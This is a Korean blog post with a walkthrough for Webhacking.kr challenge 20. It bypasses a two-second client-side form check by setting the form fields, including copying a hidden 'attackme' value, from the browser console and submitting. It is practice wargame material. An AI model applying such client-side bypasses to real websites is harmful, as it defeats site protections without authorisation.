티스토리 뷰
20번
소스를 보면 time limit:2, code칸의 버튼은 새로고침을 할 때마다 value가 바뀐다.
function ck() | |
{ | |
if(lv5frm.id.value=="") { lv5frm.id.focus(); return; } | |
if(lv5frm.cmt.value=="") { lv5frm.cmt.focus(); return; } | |
if(lv5frm.hack.value=="") { lv5frm.hack.focus(); return; } | |
if(lv5frm.hack.value!=lv5frm.attackme.value) { lv5frm.hack.focus(); return; } | |
lv5frm.submit(); | |
} |
time limit이 2초이므로 2초안에 다 해야된다는 것인데
크롬이나 IE의 콘솔창을 키고 문제 페이지를 새로고침, 2초 안에 아래의 자바스크립트를 실행시키면 된다.
javascript:lv5frm.id.value="a";
javascript:lv5frm.cmt.value="a";
javascript:lv5frm.hack.value=lv5frm.attackme.value;
javasript:lv5frm.submit();
Congratulation~!
'Web_Hacking > Webhacking.kr' 카테고리의 다른 글
[Web_Hacking] Webhacking.kr 24 (0) | 2017.02.04 |
---|---|
[Web_Hacking] Webhacking.kr 4 (0) | 2017.02.02 |
[Web_hacking] Webhacking.kr 10 (0) | 2017.01.31 |
[Web_hacking] Webhacking.kr 12 (0) | 2017.01.31 |
[Web_hacking] Webhacking.kr 16 (0) | 2017.01.23 |
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- pwnable.kr
- MySQL
- wargame.kr
- cobolt
- 명령어
- my-pass
- Los
- ubuntu
- 1번
- java
- c언어
- C
- 0xdeadbeef
- 우분투
- lob
- 파이썬
- Python
- 워게임
- 웹해킹
- lord of sqlinjection
- BOF
- 자바
- WebHacking
- pwnable
- wargame
- Lord of SQL Injection
- ftz
- attackme
- 설치
- webhacking.kr
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
글 보관함